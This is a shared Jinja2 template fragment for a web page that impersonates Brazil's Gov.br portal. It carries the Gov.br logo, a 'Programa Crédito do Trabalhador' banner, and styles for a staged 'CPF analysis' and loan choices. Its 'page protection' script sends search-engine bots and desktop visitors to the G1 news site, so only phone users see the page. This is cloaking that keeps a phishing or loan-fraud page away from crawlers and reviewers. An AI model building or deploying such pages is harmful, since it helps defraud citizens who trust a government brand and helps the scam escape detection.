<!-- Arquivo de recursos compartilhados para incluir via Jinja2 -->

<!-- Meta tags comuns -->
<meta charset="utf-8"/>
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>

<!-- CSS externo -->
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"/>
<script src="https://cdn.tailwindcss.com"></script>

<!-- Script de proteção da página -->
<script>
// Função para detectar se é um dispositivo móvel
function isMobile() {
  return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
}

// Função para detectar se é um bot
function isBot() {
  const botAgents = [
    'Googlebot', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider',
    'YandexBot', 'Sogou', 'Exabot', 'facebot', 'ia_archiver'
  ];

  return botAgents.some(bot => navigator.userAgent.includes(bot));
}

// Função para verificar se a largura da janela é maior que 768px
function isWideScreen() {
  return window.innerWidth > 768;
}

// Redirecionar ou bloquear o acesso
function checkAccess() {
  if (isBot() || (!isMobile() && isWideScreen())) {
    // Redirecionar para o site G1 se o acesso for bloqueado
    window.location.href = "https://g1.globo.com/";
  }
}

// Executar a função de verificação ao carregar a página
window.onload = checkAccess;

// Adicionar um listener para verificar novamente se a janela for redimensionada
window.addEventListener('resize', checkAccess);
</script>

<!-- CSS comum -->
<style>
    @font-face {
        font-family: 'Rawline';
        src: url("{{ url_for('static', filename='fonts/rawline-400.ea42a37247439622.woff2') }}") format('woff2');
        font-weight: 400;
        font-style: normal;
    }
    @font-face {
        font-family: 'Rawline';
        src: url("{{ url_for('static', filename='fonts/rawline-600.844a17f0db94d147.woff2') }}") format('woff2');
        font-weight: 600;
        font-style: normal;
    }
    @font-face {
        font-family: 'Rawline';
        src: url("{{ url_for('static', filename='fonts/rawline-700.1c7c76152b40409f.woff2') }}") format('woff2');
        font-weight: 700;
        font-style: normal;
    }
    * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        font-family: 'Rawline', sans-serif;
    }
    body {
        background-color: white;
        padding-top: 60px;
        color: #333333;
        font-size: 16px;
        line-height: 1.05;
        min-height: 100vh;
        display: flex;
        flex-direction: column;
    }
    .header {
        display: flex;
        justify-content: space-between;
        align-items: center;
        padding: 8px 20px;
        background-color: white;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        z-index: 1000;
        box-shadow: 0 2px 5px rgba(0,0,0,0.1);
        height: 60px;
    }
    .logo {
        width: 100px; /* Reduced logo size */
        height: auto;
    }
    .header-icons {
        display: flex;
        gap: 15px;
    }
    .header-icon {
        font-size: 18px;
        color: #1351b4;
    }
    .container {
        max-width: 800px;
        margin: 40px auto;
        padding: 0 20px;
        flex: 1;
    }
    .info-box {
        border-left: 4px solid #1351b4; /* Changed color */
        padding: 20px;
        margin-bottom: 30px;
        border-radius: 4px;
        box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        height: auto; /* Removed fixed height */
    }
    .info-box h2 {
        color: #1351b4; /* Changed color */
        font-size: 20px;
        font-weight: 600;
        margin-bottom: 15px;
    }
    .info-box p {
        color: #333;
        line-height: 1.5;
        margin-bottom: 10px;
    }
    .submit-button {
        width: 100%;
        padding: 12px;
        background-color: #1351b4; /* Changed color */
        color: white;
        border: none;
        border-radius: 4px;
        font-weight: 600;
        font-size: 16px;
        cursor: pointer;
        transition: all 0.3s ease;
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 8px;
    }
    .submit-button:hover {
        background-color: #092555;
        transform: translateY(-1px);
        box-shadow: 0 4px 6px rgba(19, 81, 180, 0.2); /* Changed color */
    }
    .footer {
        background-color: #1351b4; /* Changed color */
        color: white;
        padding: 16px;
        text-align: center;
        margin-top: 40px;
    }

    /* Estilos para a análise de CPF */
    .user-data {
        background: #1451B4;
        padding: 15px;
        border-radius: 4px;
        box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        margin-bottom: 20px;
        color: white;
    }
    .user-data-item {
        font-weight: 700;
        margin-bottom: 10px;
        font-size: 15px;
        color: white;
        display: flex;
        align-items: center;
        text-shadow: 0 1px 2px rgba(0,0,0,0.2);
    }
    .user-data-item i {
        margin-right: 10px;
        width: 20px;
        text-align: center;
        color: white;
    }
    .analysis-container {
        margin: 20px 0;
    }
    .analysis-step {
        padding: 12px 15px;
        margin: 8px 0;
        border-left: 3px solid #1351b4; /* Changed color */
        background: #f8f9fa;
        border-radius: 4px;
        opacity: 0;
        transform: translateX(-20px);
        animation: slideIn 0.8s ease forwards;
    }
    .analysis-step div {
        line-height: 1.2;
    }
    .progress-bar {
        height: 4px;
        background: #e9ecef;
        border-radius: 2px;
        margin-top: 4px;
        overflow: hidden;
    }
    .progress-bar-fill {
        height: 100%;
        background: #1351b4; /* Changed color */
        width: 0;
        animation: progressFill 2s ease-in-out;
    }
    @keyframes progressFill {
        from { width: 0; }
        to { width: 100%; }
    }
    @keyframes slideIn {
        from {
            opacity: 0;
            transform: translateX(-20px);
        }
        to {
            opacity: 1;
            transform: translateX(0);
        }
    }

    /* Estilos para opções de empréstimo */
    .select-loan {
        width: 100%; 
        padding: 10px; 
        background-color: #1351b4; 
        color: white; 
        border: none; 
        border-radius: 4px; 
        font-weight: 600; 
        cursor: pointer; 
        transition: background-color 0.3s ease;
    }
    .select-loan:hover {
        background-color: #092555;
    }
    @keyframes pulseButton {
        0% { transform: scale(1); }
        50% { transform: scale(1.02); }
        100% { transform: scale(1); }
    }
</style>

<!-- Estrutura de cabeçalho comum para todas as páginas -->
<div class="header">
    <img alt="Logo Gov.br" class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/11/Gov.br_logo.svg/2560px-Gov.br_logo.svg.png"/>
    <div class="header-icons">
        <i class="fas fa-search header-icon"></i>
        <i class="fas fa-question-circle header-icon"></i>
        <i class="fas fa-adjust header-icon"></i>
    </div>
</div>

<div style="width: 100%; background-color: #1351b4; color: white; padding: 8px; text-align: center; font-weight: 500;">
    Programa Crédito do Trabalhador - Lei nº 14.436/2025
</div> 